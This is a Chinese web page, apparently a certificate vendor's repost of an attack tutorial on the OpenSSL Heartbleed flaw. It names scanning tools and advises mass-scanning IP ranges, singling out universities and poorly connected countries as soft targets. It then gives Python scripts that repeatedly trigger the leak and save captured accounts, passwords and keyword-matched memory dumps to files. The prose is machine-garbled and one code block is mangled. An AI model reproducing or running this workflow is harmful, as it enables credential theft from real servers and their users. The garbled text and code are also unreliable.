|
|
|
联系客服020-83701501

心脏滴血另类玩法

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
心脏滴血另类玩法

在碰着存在某些心脏滴血的时辰可否会间接提交了事?说不定你会讹夺一些事多消息。
上面要说的是便是大约写一个剧本循环监控存在心脏滴血的web,存在cookie大约某些帐号密码的时辰会保存上来。
OpenSSL Heartbleed裂痕的暗中和风行让良多人高兴了一把,也让另一些人惶恐了一把。

纯粹从进击的角度讲,我已知道的,网上暗中的扫描工存在:

Nmap剧本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html

Default
1 nmap -sV --script=ssl-heartbleed <target>

Jared Stafford的testssl.py: https://gist.github.com/sh1n0b1/10100394

CSHeartbleedScanner: http://www.crowdstrike.com/community-tools/

若想要批量探求进击目标,大约间接扫目标IP段的443端口。高校和互联网不发达的国度都是比较简单进击的。

失去沉闷主机IP所在,再导入上述扫描器。

针对特定的某个进击目标,大约查抄已经读到的形式,垄断正则剖明式不停拉抓账号密码。

也大约根据环节词,不停抓下cookie,账号等。

将testssl.py的代码批改为不输出偏移所在和非ascii字符,找到hexdump函数,批改为:

Default
12345678 def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] pdat += ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print '%s' % (pdat.replace('......', ''),) print

何等就只输出无效的ascii字符串了。

1. 正则剖明式抓账号

Default
123456789101112131415 import os import re import time accounts = [] while True: result = os.popen('openssl.py ').read() matches = re.findall('"db":"(.*?)","login":"(.*?)","password":"(.*?)"', result) for match in matches: if match not in accounts: accounts.append(match) with open('accounts.txt', 'a') as inFile: inFile.write(str(match) + '\n') print 'New Account:', match time.sleep(1.0)

剧本隔断一秒钟读一次数据,发现正则立室的账号密码,若从前没泛起过,就写入accounts.txt文件。

何等大约防范重复写入同样的账号、密码。

2. 根据环节词抓数据

如果切实不用然背景所在,也不知道登录乞求、Cookie的格局,间接用环节词抓账号就好了。

类似上面的代码:

Default
123456789101112131415 import osimport reimport time accounts = []while True:result = os.popen('openssl.py ').read()keywords = ['system', 'password', 'passwd', 'admin']for word in keywords:if result.find(word) > 0:print 'new data', time.asctime()with open('data_1\\' + time.asctime().replace(':', ' ') + '.txt', 'w') as f:f.write(result)breaktime.sleep(1.0)

何等一旦返回的数据中存在环节词passwd、password等,就会把数据写入data_1文件夹上面,以年光命名。

[via@wooyun?zone]

数安新闻+更多

证书相关+更多